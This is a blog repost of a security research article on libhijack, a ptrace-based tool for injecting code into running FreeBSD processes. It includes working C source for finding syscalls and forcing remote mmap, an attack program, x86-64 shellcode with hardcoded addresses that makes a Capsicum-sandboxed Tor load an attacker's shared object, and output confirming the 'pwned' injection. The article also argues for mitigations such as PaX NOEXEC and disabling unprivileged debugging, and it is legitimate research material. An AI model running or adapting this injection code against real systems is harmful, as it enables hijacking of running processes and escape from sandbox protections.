It is with pride and pleasure that SoldierX's libhijack was featured in PoC||GTFO 0x17. Shawn Webb, the author of both libhijack and the article, spent months writing the article and going through a private peer review process.
The unedited version is posted below. The full issue can be found here (warning: large polyglot PDF). I hope you enjoy the article.
Hijacking Your Free Beasties ============================ In the land of red devils known as Beasties exists a system devoid of meaningful exploit mitigations. As we explore this vast land of opportunity, we will meet our ELFish friends, [p]tracing their very moves in order to hijack them. Since unprivileged process debugging is enabled by default on FreeBSD, we can abuse PTrace to create anonymous memory mappings, inject code into them, and overwrite PLT/GOT entries. We will revive a tool called libhijack to make our nefarious activities of hijacking ELFs via PTrace relatively easy. Nothing presented here is technically new. However, this type of work has not been documented in this much detail, tying it all into one cohesive work. In Phrack 56, Silvio Cesare taught us ELF research enthusiasts how to hook the PLT/GOT. The Phrack 59 article on Runtime Process Infection briefly introduces the concept of injecting shared objects by injecting shellcode via PTrace that calls dlopen(). No other piece of research, however, has discovered the joys of forcing the application to create anonymous memory mappings in which to inject code. This is only part one of a series of planned articles that will follow libhijack's development. The end goal is to be able to anonymously inject shared objects. The libhijack project is maintained by the SoldierX community. Previous Research ----------------- All prior work injects code into the stack, the heap, or existing executable code. All three methods create issues on today's systems. On amd64 and arm64, the two architectures libhijack cares about, the stack is non-executable by default. jemalloc, the heap implementation on FreeBSD, creates non-executable mappings. Obviously overwriting existing executable code destroys a part of the executable image. PLT/GOT redirection attacks have proven extremely useful, so much so that RELRO is a standard mitigation on hardened systems. Thankfully for us as attackers, FreeBSD doesn't use read only relocations. And even if FreeBSD did, using PTrace to do devious things negates RELRO as PTrace gives us God-like capabilities. We will see the strength of PaX NOEXEC in HardenedBSD, preventing PLT/GOT redirections and executable code injections. The Role of ELF --------------- FreeBSD provides a nifty API for inspecting the entire virtual memory space of an application. The results returned from the API tells us the protection flags (readable, writable, executable) of each mapping. If FreeBSD provides such a rich API, why would we need to parse the ELF headers? We want to ensure that we find the address of the system call instruction ("syscall" on amd64, "svc 0" on arm64) in a valid memory location. We want to ensure the proper alignment restrictions are met (amd64: 1 byte, arm64: 8 bytes). Ensuring proper alignment is important. If the execution is redirected to an improperly aligned instruction, the CPU will abort the application (SIGBUS or SIGILL will be raised on FreeBSD). Intel-based architectures, like amd64, do not care about instruction alignment, hence the 1 byte alignment described above. With a bit of additional work, we can also ensure that the mmap syscall is called from the mmap libc function. Though such an algorithm isn't currently implemented, doing so would be trivial. PLT/GOT hijacking requires parsing ELF headers. One would not be able to find the PLT/GOT without iterating through the Process Headers to find the Dynamic Headers, eventually ending up with the DT_PLTGOT entry. We make heavy use of the Struct_Obj_Entry structure, which is the second PLT/GOT entry. Indeed, in a future version of libhijack, we will likely handcraft our own Struct_Obj_Entry object and insert that into the real RTLD in order to allow the shared object to resolve symbols via normal methods. Thus, involving ELF early on through the process works to our advantage. With FreeBSD's libprocstat API, we don't have a need for parsing ELF headers until we get to the PLT/GOT stage, but doing so early makes it easier for the attacker using libhijack. libhijack does all the heavy lifting. Finding the Base Address ------------------------ Executables come in two flavors: Position-Independent Executables (PIEs) or regular executables. Since FreeBSD does not have any form of address space randomization (ASR or ASLR), FreeBSD does not ship any application built as a PIE. Because the base address of an application can change depending on architecture, compiler/linker flags, and PIE status, libhijack needs to find a way to determine the base address of the executable. The base address contains the main ELF headers. libhijack uses the libprocstat API to find the base address. The following table shows default load addresses for PIEs and non-PIES on amd64 and arm64: --------------------------------------------------- | Arch | PIE | non-PIE | --------------------------------------------------- | amd64 | 0x0000000001021000 | 0x0000000000200000 | | arm64 | 0x0000000000100000 | 0x0000000000010000 | --------------------------------------------------- libhijack will loop through all the memory mappings as returned by the libprocstat API. Only the first page of each mapping is read in--enough to check for ELF headers. If the ELF headers are found, then libhijack assumes that the first ELF object is that of the application. static int resolve_base_address(HIJACK *hijack) { struct procstat *ps; struct kinfo_proc *p; struct kinfo_vmentry *vm; unsigned int i, cnt; int err; ElfW(Ehdr) *ehdr; vm = NULL; p = NULL; err = ERROR_NONE; cnt = 0; ps = procstat_open_sysctl(); if (ps == NULL) { SetError(hijack, ERROR_SYSCALL); return (-1); } p = procstat_getprocs(ps, KERN_PROC_PID, hijack->pid, &cnt); if (cnt == 0) { err = ERROR_SYSCALL; goto error; } cnt = 0; vm = procstat_getvmmap(ps, p, &cnt); if (cnt == 0) { err = ERROR_SYSCALL; goto error; } for (i = 0; i < cnt; i++) { if (vm[i].kve_type != KVME_TYPE_VNODE) continue; ehdr = read_data(hijack, (unsigned long)(vm[i].kve_start), getpagesize()); if (ehdr == NULL) { goto error; } if (IS_ELF(*ehdr)) { hijack->baseaddr = (unsigned long)(vm[i].kve_start); break; } free(ehdr); } if (hijack->baseaddr == (unsigned long)NULL) err = ERROR_NEEDED; error: if (vm != NULL) procstat_freevmmap(ps, vm); if (p != NULL) procstat_freeprocs(ps, p); procstat_close(ps); return (err); } Assuming that the first ELF object is the application itself, though, can cause libhijack to break in some corner cases. One such corner case is when the RTLD is used to execute the application. For example, instead of calling /bin/ls directly, the user may choose to call /libexec/ld-elf.so.1 /bin/ls. Doing so causes libhijack to not find the PLT/GOT and fail early sanity checks. This can be worked around by telling libhijack the base address to use instead of attempt auto-detection. The RTLD in FreeBSD only recently gained the ability to execute applications directly. Thus, the assumption that the first ELF object is the application is generally a safe assumption to make. Finding the syscall ------------------- As mentioned above, we want to ensure with 100% certainty we're calling into the kernel from an executable memory mapping and in an allowed location. The ELF headers tell us all the publicly accessible functions loaded by a given ELF object. The application itself may never call into the kernel directly. Instead, it will rely on shared libraries to do that. The read() system call is a perfect example. Reading data from a file descriptor is a privileged operation that requires help from the kernel. The read() libc function calls the read syscall. libhijack iterates through the ELF headers, following this pseudocode algorithm: 1. Locate the first Obj_Entry structure, a linked list that describes loaded shared object. 2. Iterate through the symbol table for the shared object: 2.1. If the symbol is not a function, continue to the next symbol or break out if no more symbols. 2.2. Read the symbol's payload into memory. Scan it for the syscall opcode modulo instruction alignment. 2.3. If the instruction alignment is off, continue scanning the function. 2.4. If the syscall opcode is found and the instruction alignment requirements are met, return the address of the system call. 3. Restart step #2 with the next Obj_Entry linked list node. The above algorithm is implemented using a series of callbacks. This is to encourage an internal API that is flexible and scalable to different situations. void freebsd_parse_soe(HIJACK *hijack, struct Struct_Obj_Entry *soe, linkmap_callback callback) { int err=0; ElfW(Sym) *libsym=NULL; unsigned long numsyms, symaddr=0, i=0; char *name; numsyms = soe->nchains; symaddr = (unsigned long)(soe->symtab); do { if ((libsym)) free(libsym); libsym = (ElfW(Sym) *)read_data(hijack, (unsigned long)symaddr, sizeof(ElfW(Sym))); if (!(libsym)) { err = GetErrorCode(hijack); goto notfound; } if (ELF64_ST_TYPE(libsym->st_info) != STT_FUNC) { symaddr += sizeof(ElfW(Sym)); continue; } name = read_str(hijack, (unsigned long)(soe->strtab + libsym->st_name)); if ((name)) { if (callback(hijack, soe, name, ((unsigned long)(soe->mapbase) + libsym->st_value), (size_t)(libsym->st_size)) != CONTPROC) { free(name); break; } free(name); } symaddr += sizeof(ElfW(Sym)); } while (i++ < numsyms); notfound: SetError(hijack, err); } CBRESULT syscall_callback(HIJACK *hijack, void *linkmap, char *name, unsigned long vaddr, size_t sz) { unsigned long syscalladdr; unsigned int align; size_t left; align = GetInstructionAlignment(); left = sz; while (left > sizeof(SYSCALLSEARCH) - 1) { syscalladdr = search_mem(hijack, vaddr, left, SYSCALLSEARCH, sizeof(SYSCALLSEARCH)-1); if (syscalladdr == (unsigned long)NULL) break; if ((syscalladdr % align) == 0) { hijack->syscalladdr = syscalladdr; return TERMPROC; } left -= (syscalladdr - vaddr); vaddr += (syscalladdr - vaddr) + sizeof(SYSCALLSEARCH)-1; } return CONTPROC; } int LocateSystemCall(HIJACK *hijack) { Obj_Entry *soe, *next; if (IsAttached(hijack) == false) return (SetError(hijack, ERROR_NOTATTACHED)); if (IsFlagSet(hijack, F_DEBUG)) fprintf(stderr, "[*] Looking for syscall\n"); soe = hijack->soe; do { freebsd_parse_soe(hijack, soe, syscall_callback); next = TAILQ_NEXT(soe, next); if (soe != hijack->soe) free(soe); if (hijack->syscalladdr != (unsigned long)NULL) break; soe = read_data(hijack, (unsigned long)next, sizeof(*soe)); } while (soe != NULL); if (hijack->syscalladdr == (unsigned long)NULL) { if (IsFlagSet(hijack, F_DEBUG)) fprintf(stderr, "[-] Could not find the syscall\n"); return (SetError(hijack, ERROR_NEEDED)); } if (IsFlagSet(hijack, F_DEBUG)) fprintf(stderr, "[+] syscall found at 0x%016lx\n", hijack->syscalladdr); return (SetError(hijack, ERROR_NONE)); } Creating a new memory mapping ----------------------------- Now that we found the syscall, we can now force the application to call mmap. Both amd64 and arm64 have slightly different approaches to calling mmap. On amd64, we simply set the registers, including setting the instruction pointer, to their respective values. On arm64, we must wait until the application attempts to call a system call, then set the registers to their respective values. Finally, in both cases, we continue execution, waiting for mmap to finish. Once mmap finishes, we should have our new mapping. mmap will store the start address of the new memory mapping in rax on amd64 and x0 on arm64. We save this address, restore the registers back to their previous values, and return the address back to the user. Below is handy dandy table for the registers we set: --------------------------------------- | arch | register | value | --------------------------------------- | amd64 | rax | syscall number | | amd64 | rdi | addr | | amd64 | rsi | length | | amd64 | rdx | prot | | amd64 | r10 | flags | | amd64 | r8 | fd (-1) | | amd64 | r9 | offset (0) | | aarch64 | x0 | syscall number | | aarch64 | x1 | addr | | aarch64 | x2 | length | | aarch64 | x3 | prot | | aarch64 | x4 | flags | | aarch64 | x5 | fd (-1) | | aarch64 | x6 | offset (0) | | aarch64 | x8 | terminator | --------------------------------------- Currently, fd and offset are hardcoded to -1 and 0 respectively. The point of libhijack is to use anonymous memory mappings. When mmap returns, it will place the start address of the new memory mapping in rax on amd64 and x0 on arm64. The implementation of md_map_memory for amd64 looks like this: unsigned long md_map_memory(HIJACK *hijack, struct mmap_arg_struct *mmap_args) { REGS regs_backup, *regs; unsigned long addr, ret; register_t stackp; int err, status; ret = (unsigned long)NULL; err = ERROR_NONE; regs = _hijack_malloc(hijack, sizeof(REGS)); if (ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0) < 0) { err = ERROR_SYSCALL; goto end; } memcpy(®s_backup, regs, sizeof(REGS)); SetRegister(regs, "syscall", MMAPSYSCALL); SetInstructionPointer(regs, hijack->syscalladdr); SetRegister(regs, "arg0", mmap_args->addr); SetRegister(regs, "arg1", mmap_args->len); SetRegister(regs, "arg2", mmap_args->prot); SetRegister(regs, "arg3", mmap_args->flags); SetRegister(regs, "arg4", -1); /* fd */ SetRegister(regs, "arg5", 0); /* offset */ if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)regs, 0) < 0) { err = ERROR_SYSCALL; goto end; } /* time to run mmap */ addr = MMAPSYSCALL; while (addr == MMAPSYSCALL) { if (ptrace(PT_STEP, hijack->pid, (caddr_t)0, 0) < 0) err = ERROR_SYSCALL; do { waitpid(hijack->pid, &status, 0); } while (!WIFSTOPPED(status)); ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0); addr = GetRegister(regs, "ret"); } if ((long)addr == -1) { if (IsFlagSet(hijack, F_DEBUG)) fprintf(stderr, "[-] Could not map address. Calling mmap failed!\n"); ptrace(PT_SETREGS, hijack->pid, (caddr_t)(®s_backup), 0); err = ERROR_CHILDERROR; goto end; } end: if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)(®s_backup), 0) < 0) err = ERROR_SYSCALL; if (err == ERROR_NONE) ret = addr; free(regs); SetError(hijack, err); return (ret); } Even though we're going to write to the memory mapping, the protection level doesn't need to have the write flag set. Remember, with PTrace, we're gods. FreeBSD will allow us to write to the memory mapping via PTrace, even if that memory mapping is non-writable. HardenedBSD, a derivative of FreeBSD, prevents the creation of memory mappings that are both writable and executable. If a user attempts to create a memory mapping that is both writable and executable, the execute bit will be dropped. Similarily, HardenedBSD prevents upgrading a writable memory mapping to executable with mprotect. HardenedBSD places these same restrictions on PTrace. As a result, libhijack is completely mitigated in HardenedBSD. Hijacking the PLT/GOT --------------------- Now that we have an anonymous memory mapping we can inject code into, it's time to look at hijacking the Procedure Linkage Table/Global Offset Table. PLT/GOT hijacking only works for symbols that have been resolved by the RTLD in advance. Thus, if the function you want to hijack has not been called, its address will not be in the PLT/GOT unless BIND_NOW is active. The application itself contains its own PLT/GOT. Each shared object it depends on has its own PLT/GOT as well. For example, libpcap requires libc. libpcap calls functions in libc and thus needs its own linkage table to resolve libc functions at runtime. This is the reason why parsing the ELF headers, looking for functions, for the system call as detailed above works to our advantage. Along the way, we get to know certain pieces of info, like where the PLT/GOT is. libhijack will cache that information along the way. In order to hijack PLT/GOT entries, we need to know two pieces of information: the address of the PLT/GOT entry we want to hijack and the address to point it to. Luckily, libhijack has an API for resolving functions and their locations in the PLT/GOT. Once we have those two pieces of information, then hijacking the GOT entry is simple and straight-forward. We just replace the entry in the GOT with the new address. Ideally, the the injected code would first stash the original address for later use. Case Study: Tor Capsicumization ------------------------------- Capsicum is a capabilities framework for FreeBSD. It's commonly used to implement application sandboxing. HardenedBSD is actively working on integrating Capsicum for Tor. Tor currently supports a sandboxing methodology that is wholly incompatible with Capsicum. Tor's sandboxing model uses seccomp2, a filtering-based sandbox. When Tor starts up, Tor tells its sandbox initialization routines to whitelist certain resources followed by activation of the sandbox. Tor then can call open(2), stat(2), etc. as needed on an on-demand basis. In order to prevent a full rewrite of Tor to handle Capsicum, HardenedBSD has opted to use wrappers around so-called "privileged operation" function calls (ie, open(2), stat(2), etc.) Thus, open(2) becomes sandbox_open(). Prior to entering capabilities mode (capmode for short), Tor will pre-open any directories within which it expects to open files. Any time Tor expects to open a file, it will call openat rather than open. Thus, Tor is limited to using files within the directories it uses. For this reason, we will place the shared object within Tor's data directory. This is not unreasonable, since we either must be root or running as the same user as the tor daemon in order to use libhijack against it. Note that as of the time of this writing, the Capsicum patch to Tor has not landed upstream and is in a separate repository. The work-in-progress code can be found here: https://github.com/lattera/tor/tree/hardening/capsicum Since FreeBSD does not implement any meaningful exploit mitigation outside of arguably ineffective stack cookies, an attacker can abuse memory corruption vulnerabilities to use ret2libc style attacks against wrapper-style capsicumized applications with 100% reliability. Instead of ret2open, all the attacker needs to do is ret2sandbox_open. Without exploit mitigations like PaX ASLR, PaX NOEXEC, and/or CFI, the following code can be used copy/paste style, allowing for mass exploitation without payload modification. To illustrate the need for ASLR and NOEXEC, we will use libhijack to emulate a vulnerability exploitation resulting in a control flow hijack. Note that due using libhijack, we bypass the forward-edge guarantees CFI gives us. llvm's implementation of CFI does not include backward-edge guarantees. We could gain backward-edge guarantees through SafeStack; however, Tor immediately crashes when compiled with both CFI and SafeStack. In the following code snippet, we perform the following: 1. We attach to the victim process. 2. We create an anonmymous memory allocation with read and execute privileges. 3. We write the filename that we'll pass to sandbox_open() into the beginning of the allocation. 4. We inject the shellcode into the allocation, just after the filename. 5. We execute the shellcode and detach from the process 6. The following pertains now to the shellcode: 7. We call sandbox_open. The address is hardcoded and can be reused among like systems. 8. We save the return value of sandbox_open, which will be the opened file descriptor. 9. We pass the file descriptor to fdopen. The address of fdopen is hardcoded and can be reused on like systems. 10. The RTLD loads the shared object. 10.1. Part of loading is calling any initialization routines. In this case, a simple string is printed to the console. /* main.c */ #define MMAP_HINT 0x4000UL void usage(char *name) { fprintf(stderr, "USAGE: %s\n", name); exit(0); } int main(int argc, char *argv[]) { unsigned long addr, ptr; HIJACK *ctx; if (argc != 4) usage(argv[0]); ctx = InitHijack(F_DEFAULT); AssignPid(ctx, (pid_t)atoi(argv[1])); if (Attach(ctx)) { fprintf(stderr, "[-] Could not attach!\n"); exit(1); } LocateSystemCall(ctx); addr = MapMemory(ctx, MMAP_HINT, getpagesize(), PROT_READ | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE); if (addr == (unsigned long)-1) { fprintf(stderr, "[-] Could not map memory!\n"); Detach(ctx); exit(1); } ptr = addr; WriteData(ctx, addr, argv[3], strlen(argv[3])+1); ptr += strlen(argv[3]) + 1; InjectShellcodeAndRun(ctx, ptr, argv[2], true); Detach(ctx); return (0); } /* end of main.c */ /* sandbox_fdlopen.asm */ BITS 64 mov rbp, rsp ; Save registers push rdi push rsi push rdx push rcx push rax ; Call sandbox_open mov rdi, 0x4000 xor rsi, rsi xor rdx, rdx xor rcx, rcx mov rax, 0x00000000011c4070 ; Address of sandbox_open call rax ; Call fdlopen mov rdi, rax mov rsi, 0x101 mov rax, 0x8014c3670 ; Address of fdlopen call rax ; Restore registers pop rax pop rcx pop rdx pop rsi pop rdi mov rsp, rbp ret /* end of sandbox_fdlopen.asm */ /* testso.c */ __attribute__((constructor)) void init(void) { printf("This output is from an injected shared object. You have been pwned.\n"); } /* end of testso.c */ Output of Tor: Oct 04 18:59:25.976 [notice] Tor 0.3.2.2-alpha running on FreeBSD with Libevent 2.1.8-stable, OpenSSL 1.0.2k-freebsd, Zlib 1.2.11, Liblzma N/A, and Libzstd N/A. Oct 04 18:59:25.976 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning Oct 04 18:59:25.976 [notice] This version is not a stable Tor release. Expect more bugs than usual. Oct 04 18:59:25.977 [notice] Read configuration file "/home/shawn/installs/etc/tor/torrc". Oct 04 18:59:25.982 [notice] Scheduler type KISTLite has been enabled. Oct 04 18:59:25.982 [notice] Opening Socks listener on 127.0.0.1:9050 Oct 04 18:59:25.000 [notice] Parsing GEOIP IPv4 file /home/shawn/installs/share/tor/geoip. Oct 04 18:59:26.000 [notice] Parsing GEOIP IPv6 file /home/shawn/installs/share/tor/geoip6. Oct 04 18:59:26.000 [notice] Bootstrapped 0%: Starting Oct 04 18:59:27.000 [notice] Starting with guard context "default" Oct 04 18:59:27.000 [notice] Bootstrapped 80%: Connecting to the Tor network Oct 04 18:59:28.000 [notice] Bootstrapped 85%: Finishing handshake with first hop Oct 04 18:59:29.000 [notice] Bootstrapped 90%: Establishing a Tor circuit Oct 04 18:59:31.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working. Oct 04 18:59:31.000 [notice] Bootstrapped 100%: Done This output is from an injected shared object. You have been pwned. The Future of libhijack ----------------------- Writing devious code in assembly is cumbersome. Assembly doesn't scale well to multiple architectures. Instead, we would like to write our devious code in C, compiling to a shared object that gets injected anonymously. This requires writing a remote RTLD within libhijack and is in progress. Writing a remote RTLD will take a while as doing so is not an easy task. Additionally, creation of a general-purpose helper library that gets injected would be helpful. It could aid in PLT/GOT redirection attacks, possibly storing the addresses of functions we've previously hijacked. This work is dependent on the remote RTLD. libhijack currently lacks documentation. Once the ABI and API stabilize, formal documentation will be written. Conclusion ---------- Using libhijack, we can easily create anonymous memory mappings, inject into them arbitrary code, and hijack the PLT/GOT on FreeBSD. On HardenedBSD, a hardened derivative of FreeBSD, libhijack is fully mitigated through PaX NOEXEC. We've demonstrated that wrapper-style Capsicum is ineffective on FreeBSD. Through the use of libhijack, we emulate a control flow hijack in which the application is forced to call sandbox_open and fdlopen on the resulting file descriptor. Further work to support anonymous injection of full shared objects, along with their dependencies, will be supported in the future. Imagine injecting libpcap into Apache to sniff traffic whenever "GET /pcap" is sent. In order to prevent abuse of PTrace, FreeBSD should set the security.bsd.unprivileged_proc_debug to 0 by default. In order to prevent process manipulation, FreeBSD should implement PaX NOEXEC. libhijack can be found at https://github.com/SoldierX/libhijack